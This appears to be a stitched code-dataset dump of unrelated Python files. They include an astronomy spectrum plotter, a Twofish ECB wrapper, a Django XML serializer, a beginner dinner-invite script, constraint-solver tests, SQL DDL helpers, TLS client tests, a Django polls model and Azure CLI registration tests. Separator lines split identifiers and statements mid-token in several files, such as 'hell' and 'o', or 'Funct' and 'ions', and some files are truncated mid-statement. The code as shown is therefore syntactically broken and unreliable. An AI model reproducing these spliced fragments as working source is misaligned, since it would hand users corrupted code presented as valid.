gaiafignum=0, gaiafig=None, clickid=None, **kwargs ):
self.vconv = vconv
self.xtora = xtora
self.ytodec = ytodec
self.cube = cube # where(numpy.isnan(cube),0,cube)
if len(self.cube.shape) > 1:
self.spectrum = cube[:,0,0] # spectrum is what's plotted; cube is the "raw data"
else:
self.spectrum = cube # spectrum is what's plotted; cube is the "raw data"
self.specname=specname
self.dv=dv
self.reffreq=reffreq
self.scale=1.0
self.units='K'
self.xunits=xunits
self.voff=0.0
self.offset=0.0
self.continuum=0.0
self.errspec = errspec
self.erralpha=erralpha
self.plotcolor=color
self.specfit = Specfit(self)
self.fitspec = self.specfit
self.baseline = Baseline(self)
#self.fft = FFT(self)
#self.psd = self.fft.psd
self.vmin=None
self.vmax=None
self.title=title
self.ivconv=ivconv
self.autorefresh=autorefresh
self.spectrumplot=None
self.errorplot=None
self.gaiafignum = gaiafignum
self.gaiafig = gaiafig
self.clickid = clickid
self.plotkwargs = kwargs
if maskspec is not None:
self.maskspec = maskspec
else:
self.maskspec = zeros(self.cube.shape)
self.linecollections =[]
self.texts =[]
if hdr: self.header = hdr
# figure out where to put the plot
if fig is None and axis is None:
fig=figure(fignum)
if clear: fig.clf()
self.axis = fig.gca()
elif fig is None and axis is None:
self.axis = pylab.gca()
elif fig is not None and axis is None:
if clear: fig.clf()
self.axis = fig.gca()
elif fig is None and axis is not None:
self.axis = axis
else: # if figure and axis are both set, just use axis
self.axis = axis
if clear: self.axis.clear()
def __call__(self, event):
"""
Connects map cube to specplotter...
"""
if event.inaxes:
clickX = event.xdata
clickY = event.ydata
tb = get_current_fig_manager().toolbar
#if ((self.axis is None) or (self.axis==event.inaxes)) and tb.mode=='':
if event.button==1 and tb.mode=='':
print "OverPlotting spectrum from point %i,%i" % (clickX,clickY)
self.plotspec(clickY,clickX,button=event.button,cube=True)
elif event.button==2:
print "Plotting spectrum from point %i,%i" % (clickX,clickY)
self.plotspec(clickY,clickX,button=event.button,cube=True,clear=True)
elif event.button==3:
print "Disconnecting GAIA-like tool"
self.gaiafig.canvas.mpl_disconnect(self.clickid)
else:
print "Call failed for some reason: "
print "event: ",event
def plotspec(self, i=0, j=0, cube=False, title=None,
clear=False, color=None, continuum=None,
axis=None, offset=None, scale=None, voff=None, vmin=None,
vmax=None, units=None, xunits=None, erralpha=None, plotpix=False,
errstyle='fill', autorefresh=None, button=None, **kwargs):
"""
Plot a spectrum
Originally written to plot spectra from data cubes, hence the i,j parameter
to specify the location in the cube
Now, cube defaults to False, but you can still pass in a data cube.
Inputs:
            title,color, kwargs - semi-obvious plot-related commands
axis - You can pass in a Matplotlib axis instance and it will plot on that
clear - Clear the axis before plotting?
continuum - if you've already subtracted out a continuum, you can add
it back in (only if it is a constant offset). It will be included in
the spectrum
offset - Like continuum, but ONLY for plotting purposes. Will move the
plot vertically but will NOT include values in the .spectrum
scale - multiplicative factor to scale the data by (NOT for plotting
purposes; modifies spectrum)
voff - Shift the spectrum on the velocity axis by this amount
vmin,vmax - only plot within this range
(note tha
|
t these keywords passed to splat_1d MAY crop the spectrum)
units - units of th
|
e data. At the moment, no conversions are done
            xunits - units of the X axis. Can affect other procedures, like show_lines,
and some unit conversion (Hz to GHz) is done
erralpha - Transparency of the errorbars if plotted
errstyle - style of errorbars if plotted
plotpix - if set, will plot against a pixel (channel) axis instead of a
physical axis
autorefresh - automatically update the plot when fitting gaussians, labeling,
etc?
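        An illustrative call, using the keywords documented above (the values and
        the instance name `sp` are hypothetical):
            sp.plotspec(vmin=-100, vmax=100, color='b', errstyle='fill',
                        offset=0.5, clear=True)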
"""
if kwargs.has_key('fignum'): kwargs.pop('fignum') # HACK because I want __init__ to accept different kwargs
if kwargs.has_key('fig'): kwargs.pop('fig') # is there a better workaround?
if scale is not None: self.scale = scale
if units is not None: self.units = units
if xunits is not None: self.xunits= xunits
if voff is not None: self.voff = voff
if offset is not None: self.offset= offset
if continuum is not None: self.continuum= continuum
if color is not None: self.plotcolor=color
if erralpha is not None: self.erralpha= erralpha
if vmax is not None: self.vmax = vmax
if vmin is not None: self.vmin = vmin
if title is not None: self.title = title
if autorefresh is not None: self.autorefresh = autorefresh
if axis is None: axis=self.axis # allow spectrum to be plotted on other axis
if clear: axis.clear()
if plotpix:
self.vind = arange(self.cube.shape[0])
else:
self.vind = self.vconv(arange(self.cube.shape[0])) + self.voff
if kwargs.has_
|
hupf/passwordchest
|
src/loxodo/twofish/twofish_ecb.py
|
Python
|
gpl-2.0
| 2,538
| 0.003546
|
#
# Loxodo -- Password Safe V3 compatible Password Vault
# Copyright (C) 2008 Christoph Sommer <mail@christoph-sommer.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import twofish
class TwofishECB:
"""
Electronic codebook (ECB) Twofish operation mode.
"""
def __init__(self, key):
"""
Set the key to be used for en-/de-cryption.
"""
self.twofish = twofish.Twofish()
self.twofish.set_key(key)
def encrypt(self, plaintext):
"""
Encrypt the given string using Twofish ECB.
"""
if len(plaintext) % 16:
raise RuntimeError("Twofish plaintext length must be a multiple of 16")
ciphertext = ""
while len(plaintext) >= 16:
ciphertext += self.twofish.encrypt(plaintext[0:16])
plaintext = plaintext[16:]
return ciphertext
def decrypt(self, ciphertext):
"""
Decrypt the given string using Twofish ECB.
"""
if len(ciphertext) % 16:
raise RuntimeError("Twofish ciphertext length must be a multiple of 16")
plaintext = ""
while len(ciphertext) >= 16:
plaintext += self.twofish.decrypt(ciphertext[0:16])
ciphertext = ciphertext[16:]
return plaintext
def test_twofish_ecb():
__testkey = "Now Testing Crypto-Funct
|
ions...."
__testenc = "Passing nonsense through crypt-API, will then do assertion check"
__testdec = "\x71\xbf\x8a\xc5\x8f\x6c\x2d\xce\x9d\xdb\x85\x82\x5b\x25\xe3\x8d\xd8\x59\x86\x34\x28\x7b\x58\x06\xca\x42\x3d\xab\xb7\xee\x56\x6f\xd3\x90\xd6\x96\xd5\x94\x8c\x70\x38\x05\xf8\xdf\x92\xa4\x06\x2f\x32\x7f\xbd\xd7\x05\x41\x32\xaa\x60\xfd\x18\xf4\x42\x15\x15\x56"
assert TwofishECB(__testkey).decrypt(__testenc) == __testdec
assert TwofishECB(__testkey).encrypt(__t
|
estdec) == __testenc
test_twofish_ecb()
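# A minimal round-trip sketch (illustrative; the key and message below are made
# up and must each be a whole number of 16-byte blocks):
#
#     ecb = TwofishECB("0123456789abcdef")
#     assert ecb.decrypt(ecb.encrypt("sixteen byte msg")) == "sixteen byte msg"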
|
nycholas/ask-undrgz
|
src/ask-undrgz/django/core/serializers/xml_serializer.py
|
Python
|
bsd-3-clause
| 11,755
| 0.003063
|
"""
XML serializer.
"""
from django.conf import settings
from django.core.serializers import base
from django.db import models, DEFAULT_DB_ALIAS
from django.utils.xmlutils import SimplerXMLGenerator
from django.utils.encoding import smart_unicode
from xml.dom import pulldom
class Serializer(base.Serializer):
"""
Serializes a QuerySet to XML.
"""
def indent(self, level):
if self.options.get('indent', None) is not None:
self.xml.ignorableWhitespace('\n' + ' ' * self.options.get('indent', None) * level)
def start_serialization(self):
"""
Start serialization -- open the XML document and the root element.
"""
self.xml = SimplerXMLGenerator(self.stream, self.options.get("encoding", settings.DEFAULT_CHARSET))
self.xml.startDocument()
self.xml.startElement("django-objects", {"version" : "1.0"})
def end_serialization(self):
"""
End serialization -- end the document.
"""
self.indent(0)
self.xml.endElement("django-objects")
self.xml.endDocument()
def start_object(self, obj):
"""
Called as each object is handled.
"""
if not hasattr(obj, "_meta"):
raise base.SerializationError("Non-model object (%s) encountered during serialization" % type(obj))
self.indent(1)
self.xml.startElement("object", {
"pk" : smart_unicode(obj._get_pk_val()),
"model" : smart_unicode(obj._meta),
})
def end_object(self, obj):
"""
Called after handling all fields for an object.
"""
self.indent(1)
self.xml.endElement("object")
def handle_field(self, obj, field):
"""
Called to handle each field on an object (except for ForeignKeys and
ManyToManyFields)
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"type" : field.get_internal_type()
})
# Get a "string version" of the object's data.
if getattr(obj, field.name) is not None:
self.xml.characters(field.value_to_string(obj))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_fk_field(self, obj, field):
"""
Called to handle a ForeignKey (we need to treat them slightly
differently from regular fields).
"""
self._start_relational_field(field)
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
# If related object has a natural key, use it
related = related.natural_key()
# Iterable natural keys are rolled out as subelements
for key_value in related:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = getattr(related, field.rel.field_name)
self.xml.characters(smart_unicode(related))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_m2m_field(self, obj, field):
"""
Called to handle a ManyToManyField. Related objects are only
serialized as references to the object's PK (i.e. the related *data*
is not dumped, just the relation).
"""
if field.rel.through._meta.auto_created:
self._start_relational_field(field)
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
# If the objects in the m2m have a natural key, use it
def handle_m2m(value):
natural = value.natural_key()
# Iterable natural keys are rolled out as subelements
self.xml.startElement("object", {})
for key_value in natural:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
self.xml.endElement("object")
else:
def handle_m2m(value):
self.xml.addQuickElement("object", attrs={
'pk' : smart_unicode(value._get_pk_val())
})
for relobj in getattr(obj, field.name).iterator():
handle_m2m(relobj)
self.xml.endElement("field")
def _start_relational_field(self, field):
"""
Helper to output the <field> element for relational fields
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"rel" : field.rel.__class__.__name__,
"to" : smart_unicode(field.rel.to._meta),
})
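# In practice this serializer is usually reached through Django's serializer
# registry rather than instantiated directly, e.g. (the model below is
# hypothetical):
#
#     from django.core import serializers
#     xml_output = serializers.serialize('xml', SomeModel.objects.all())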
class Deserializer(base.Deserializer):
"""
Deserialize XML.
"""
def __init__(self, stream_or_string, **options):
super(Deserializer, self).__init__(stream_or_string, **options)
self.event_stream = pulldom.parse(self.stream)
self.db = options.pop('using', DEFAULT_DB_ALIAS)
def next(self):
for event, node in self.event_stream:
if event == "START_ELEMENT" and node.nodeName == "object":
self.event_stream.expandNode(node)
return self._handle_object(node)
raise StopIteration
def _handle_object(self, node):
"""
Convert an <object> node to a DeserializedObject.
"""
# Look up the model using the model loading mechanism. If this fails,
# bail.
Model = self._get_model_from_node(node, "model")
# Start building a data dictionary from the object. If the node is
# missing the pk attribute, bail.
pk = node.getAttribute("pk")
if not pk:
raise base.DeserializationError("<object> node is missing the 'pk' attribute")
data = {Model._meta.pk.attname : Model._meta.pk.to_python(pk)}
# Also start building a dict of m2m data (t
|
his is saved as
# {m2m_accessor_attribute : [list_of_related_objects]})
m2m_data = {}
        # Deserialize each field.
for field_node in node.getElementsByTagName("field"):
# If the field is missing the name attribute, bail (are you
# sensing a pattern here?)
field_
|
name = field_node.getAttribute("name")
if not field_name:
raise base.DeserializationError("<field> node is missing the 'name' attribute")
# Get the field from the Model. This will raise a
# FieldDoesNotExist if, well, the field doesn't exist, which will
# be propagated correctly.
field = Model._meta.get_field(field_name)
# As is usually the case, relation fields get the special treatment.
if field.rel and isinstance(field.rel, models.ManyToManyRel):
m2m_data[field.name] = self._handle_m2m_field_node(field_node, field)
elif field.rel and isinstance(field.rel, models.ManyToOneRel):
data[field.attname] = self._handle_fk_field_node(field_node, field)
else:
if field_node.getElementsByTagName('None'):
value = None
else:
value = field.to_python(getInnerText(field_node).strip())
data[field.name] = value
# Return a DeserializedObject so that the m2m data has a place to live.
return base.DeserializedObject(Model(**data), m2m_data)
def _handle_fk_field_node(self, node, field):
"""
Handle a <field> node for a ForeignKey
"""
# Check if the
|
lukeebhert/python_crash_course
|
Chapter_3/dinner_guests.py
|
Python
|
gpl-3.0
| 740
| 0.005405
|
invites = ['Queen Elizabeth II', 'Prince Philip','Duchess Kate','Prince William']
hell
|
o = "Your majesty "
message = ", you are invited to the Royal Dinner Party. \n- King George"
rsvp_qe = hello + invites[0] + message
rsvp_pp = hello + invites[1] + message
rsvp_dk = hello + invites[2] + message
rsvp_pw = hello + invites[3] + message
print(rsvp_qe)
print(rsvp_pp)
print(rsvp_dk)
print(rsvp_pw)
# Prince Philip cannot make it so
|
we are inviting Princess Margaret
print('\n' + invites[1] + ' cannot make it to the dinner')
invites[1] = 'Princess Margaret'
rsvp_pm = hello + invites[1] + message
print('\n' + rsvp_qe)
print(rsvp_pm)
print(rsvp_dk)
print(rsvp_pw)
print("\nThere are " + str(len(invites)) + " people invited to dinner.")
|
eomahony/Numberjack
|
tests/SolverTests.py
|
Python
|
lgpl-2.1
| 32,022
| 0.02339
|
'''
Numberjack is a constraint satisfaction and optimisation library
Copyright (C) 2009 Cork Constraint Computation Center, UCC
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
The authors can be contacted electronically at
numberjack.support@gmail.com
'''
import unittest
import sys
from Numberjack import *
from Mistral import Solver
class Test(unittest.TestCase):
def testVariable_backtrack(self):
'''
This is a quick test of the ability of the variable to backtrack properly
'''
# Removal test
var = Variable(list(range(0,10)))
assert(var.can_be_instantiated_to(5))
var.backtrack_stamp()
var.remove_value(5)
assert(not var.can_be_instantiated_to(5))
var.backtrack()
assert(var.can_be_instantiated_to(5))
# Assignment test
var = Variable(list(range(0,10)))
assert(not var.get_is_instantiated())
var.backtrack_stamp()
var.set_value(5)
assert(not var.can_be_instantiated_to(4))
assert(var.get_is_instantiated())
assert(var.get_value() == 5)
var.backtrack()
assert(not var.get_is_instantiated())
assert(var.can_be_instantiated_to(4))
def testEqual(self):
var1 = Variable([0])
var2 = Variable(list(range(0,1)))
model = NativeModel()
model.add_variable((var1, var2))
solver = Solver(model)
assert(solver.solve())
def testStupid_not_eq(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(NotEqual((var1, var2)))
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() != var2.get_value())
def testPropogationHandler(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
neq = NotEqual((var1, var2)).repr_con
neq.set_up_for_solver()
ph = Solving.PropogationHandler()
ph.add_to_stack(neq)
var1.set_propogation_handler(ph)
var2.set_propogation_handler(ph)
assert(len(ph._PropogationHandler__prop_stack) == 1)
var1.remove_value(1)
var2.remove_value(0)
assert(len(ph._PropogationHandler__prop_stack) == 1)
def testNot_eq_test2(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(NotEqual((var1, var2)))
model.add_constraint(NotEqual((var1, var3)))
model.add_constraint(NotEqual((var2, var3)))
bc = BasicConstraint([var1])
|
def bc_prop(obj):
vars = obj.get_variables()
if vars[0].get_is_instantiated() and vars[0].get_value() == 1:
obj.fail()
bc.rt_propogate = bc_prop
model.add_constraint(bc)
solver = Solver(model)
assert(solver.solve())
def testGEQ(self):
var1, var
|
2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Geq((var1, var2)))
model.add_constraint(Geq((var2, var3)))
model.add_constraint(Geq((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLEQ(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Leq((var1, var2)))
model.add_constraint(Leq((var2, var3)))
model.add_constraint(Leq((var1, var3)))
model.add_constraint(Equal((var1, var2)))
model.add_constraint(NotEqual((var2, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLT(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Lt((var1, var2)))
model.add_constraint(Lt((var2, var3)))
model.add_constraint(Lt((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testGT(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Gt((var1, var2)))
model.add_constraint(Gt((var2, var3)))
model.add_constraint(Gt((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testPlus(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(Equal((var1, Plus(var2, 3))))
solver = Solver(model)
assert(solver.solve())
#print "%d %d " % (var1.get_value(), var2.get_value())
def testMinus(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(Equal((var1, Minus(var2, 3))))
solver = Solver(model)
assert(solver.solve())
def testTimes(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testVariableBounds(self):
var = Variable(list(range(0,10)))
assert(var.get_lower() == 0)
assert(var.get_upper() == 9)
var.backtrack_stamp()
var.set_lower(4)
assert(var.get_lower() == 4)
assert(var.get_upper() == 9)
var.set_upper(6)
assert(var.get_lower() == 4)
assert(var.get_upper() == 6)
var.backtrack()
assert(var.get_lower() == 0)
assert(var.get_upper() == 9)
def testSum(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
var3 = Variable(list(range(3,5)))
model = NativeModel()
svar = Sum((var1, var2))
model.add_variable((var1, var2, var3, svar))
model.add_constraint(Equal((svar, var3)))
solver = Solver(model)
assert(solver.solve())
#svar.print_domain()
#var1.print_domain()
|
portfoliome/postpy
|
postpy/base.py
|
Python
|
mit
| 4,942
| 0
|
from collections import namedtuple
from foil.formatters import format_repr
from postpy.ddl import (
compile_column, compile_qualified_name, compile_primary_key,
compile_create_table, compile_create_temporary_table
)
__all__ = ('Database', 'Schema', 'Table', 'Column', 'PrimaryKey', 'View')
class Database:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE DATABASE %s;' % self.name
def drop_statement(self):
return 'DROP DATABASE IF EXISTS %s;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Schema:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE SCHEMA IF NOT EXISTS %s;' % self.name
def drop_statement(self):
return 'DROP SCHEMA IF EXISTS %s CASCADE;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Table(namedtuple('Table', 'name columns primary_key schema')):
"""Table statement formatter."""
__slots__ = ()
def __new__(cls, name: str, columns, primary_key, schema='public'):
return super(Table, cls).__new__(cls, name, columns,
primary_key,
schema)
def create_statement(self):
return compile_create_table(self.qualified_name,
self.column_statement,
self.primary_key_statement)
def drop_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.qualified_name)
def create_temporary_statement(self):
"""Temporary Table Statement formatter."""
return compile_create_temporary_table(self.name,
self.column_statement,
self.primary_key_statement)
def drop_temporary_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.name)
@property
def qualified_name(self):
return compile_qualified_name(self.name, schema=self.schema)
@property
def column_names(self):
return [column.name for column in self.columns]
@property
def primary_key_columns(self):
return self.primary_key.column_names
@property
def column_statement(self):
return ' '.join(c.create_statement() for c in self.columns)
@property
def primary_key_statement(self):
return self.primary_key.create_statement()
class Column(namedtuple('Column', 'name data_type nullable')):
__slots__ = ()
def __new__(cls, name: str, data_type: str, nullable=False):
return super(Column, cls).__new__(cls, name, data_type, nullable)
def create_statement(self):
return compile_column(self.name, self.data_type, self.nullable)
class PrimaryKey(namedtuple('PrimaryKey', ['column_names'])):
__slots__ = ()
def __new__(cls, column_names: list):
return super(PrimaryKey, cls).__new__(cls, column_names)
def create_statement(self):
return compile_primary_key(self.column_names)
class View:
"""Postgresql View statement formatter.
Attributes
----------
name : view name
statement: the select or join statement the view is based on.
"""
def __init__(self, name: str, statement: str):
self.name = name
self.statement = statement
def drop_statement(self):
return 'DROP VIEW IF EXISTS {};'.format(self.name)
def create_statement(self):
return 'CREATE VIEW {name} AS {statement};'.format(
name=self.name, statement=self.statement)
def make_delete_table(table: Table, delete_prefix='delete_from__') -> Table:
"""Table referencing a delete from using primary key join."""
name = delete_prefix + table.name
primary_key = table.primary_key
key_names = set
|
(primary_key.column_names)
columns = [column for column in table.columns if column.name in key_names]
table = Table(name, columns, primary_key)
return table
def split_qualified_name(qualified_name: str, schema='public'):
if '.' in qualified_name:
schema, table = qualified_name.split('.')
else:
table = qualified_name
return schema, table
def order_table_columns(table: Table, column_names: list) -> Table:
"""Record tab
|
le column(s) and primary key columns by specified order."""
unordered_columns = table.column_names
index_order = (unordered_columns.index(name) for name in column_names)
ordered_columns = [table.columns[i] for i in index_order]
ordered_pkey_names = [column for column in column_names
if column in table.primary_key_columns]
primary_key = PrimaryKey(ordered_pkey_names)
return Table(table.name, ordered_columns, primary_key, table.schema)
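# A minimal usage sketch (illustrative; the table and column names are made up):
#
#     columns = [Column('id', 'integer'), Column('name', 'text', nullable=True)]
#     users = Table('users', columns, PrimaryKey(['id']))
#     users.create_statement()   # CREATE TABLE DDL for the qualified name public.users
#     users.drop_statement()     # DROP TABLE IF EXISTS DDL for public.users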
|
uberVU/mongo-oplogreplay
|
oplogreplay/__init__.py
|
Python
|
mit
| 39
| 0.025641
|
from oplogreplayer import O
|
plogRe
|
player
|
keybar/keybar
|
src/keybar/tests/test_client.py
|
Python
|
bsd-3-clause
| 4,080
| 0.001225
|
import os
import pytest
import requests
from keybar.client import TLS12SSLAdapter
from keybar.tests.helpers import LiveServerTest
from keybar.tests.factories.user import UserFactory
from keybar.tests.factories.device import (
AuthorizedDeviceFactory, PRIVATE_KEY, PRIVATE_KEY2)
from keybar.utils.http import InsecureTransport
def verify_rejected_ssl(url):
"""
    Verify that requesting the url with the TLS 1.2 adapter raises SSLError
    because the remote server only supports weak ciphers or protocols.
"""
with pytest.raises(requests.exceptions.SSLError):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
session.get(url)
return True
@pytest.mark.django_db(transaction=True)
class TestTestClient(LiveServerTest):
def test_url_must_be_https(self):
client = self.get_client(None, None)
with pytest.raises(InsecureTransport):
client.get('http://fails.xy')
def test_simple_unauthorized(self):
user = UserFactory.create()
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, None)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
def test_simple_authorized(self):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 200
assert response.content == b'"{\\"dummy\\": \\"ok\\"}"'
def test_simple_wrong_device_secret(self, settings):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY2)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
assert response.json()['detail'] == 'Error decoding signature.'
def test_to_server_without_tls_10(self, allow_offline):
"""
        Verify that a connection is possible to SFDC servers that have disabled TLS 1.0.
"""
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://tls1test.salesforce.com/s/')
assert response.status_code == 200
def t
|
est_under_downgrade_attack_to_ssl_3(self, allow_offline):
"""
Verify that the connection is rej
|
ected if the remote server (or man
in the middle) claims that SSLv3 is the best supported protocol.
"""
url = 'https://ssl3.zmap.io/sslv3test.js'
assert verify_rejected_ssl(url)
def test_protocols_by_ssl_labs(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://www.ssllabs.com/ssltest/viewMyClient.html')
assert 'Your user agent has good protocol support' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_sni_suport(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://sni.velox.ch/')
assert 'sent the following TLS server name indication extension' in response.text
assert 'negotiated protocol: TLSv1.2' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_vulnerability_logjam_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10445/')
def test_vulnerability_freak_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10444/')
def test_vulnerability_osx_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10443/')
|
chandu-atina/User-Management
|
rfxapp/models.py
|
Python
|
mit
| 893
| 0.006719
|
from django.db import models
from django.utils import timezone
import datetime
# Create your models
|
here.
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self): # __unicode__ on Python 2
return self.question_text
def was_published_recently(self):
return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
was_published_recently.admin_order_field = 'pub_date'
was_published
|
_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
class Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self): # __unicode__ on Python 2
return self.choice_text
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/tests/test_command_registration.py
|
Python
|
mit
| 15,404
| 0.003635
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import logging
import unittest
from azure.cli.core.commands import _update_command_definitions
from azure.cli.core.commands import (
command_table,
CliArgumentType,
ExtensionCommandSource,
CliCommandArgument,
cli_command,
register_cli_argument,
register_extra_cli_argument)
from azure.cli.core.extension import EXTENSIONS_MOD_PREFIX
class Test_command_registration(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Ensure initialization has occurred correctly
import azure.cli.main
logging.basicConfig(level=logging.DEBUG)
@classmethod
def tearDownClass(cls):
logging.shutdown()
@staticmethod
def sample_vm_get(resource_group_name, vm_name, opt_param=None, expand=None, custom_headers=None, raw=False,
**operation_config):
"""
The operation to get a virtual machine.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
|
:type vm_name: str
:param opt_param: Used to verify reflection correctly
identifies optional params.
:type opt_param: object
:param expand: The expand expression to apply on the operation.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param boolean raw: returns the direct response alongs
|
ide the
deserialized response
:rtype: VirtualMachine
:rtype: msrest.pipeline.ClientRawResponse if raw=True
"""
pass
def test_register_cli_argument(self):
command_table.clear()
cli_command(None, 'test register sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__))
register_cli_argument('test register sample-vm-get', 'vm_name', CliArgumentType(
options_list=('--wonky-name', '-n'), metavar='VMNAME', help='Completely WONKY name...',
required=False
))
command_table['test register sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test register sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name', required=True),
'vm_name': CliArgumentType(dest='vm_name', required=False),
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['vm_name'].options_list, ('--wonky-name', '-n'))
def test_register_command(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_table['test command sample-vm-get'].load_arguments()
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name',
required=True,
help='The name of the resource group.'),
'vm_name': CliArgumentType(dest='vm_name',
required=True,
help='The name of the virtual machine.'),
'opt_param': CliArgumentType(required=False,
help='Used to verify reflection correctly identifies optional params.'), # pylint: disable=line-too-long
'expand': CliArgumentType(required=False,
help='The expand expression to apply on the operation.')
}
for probe in some_expected_arguments:
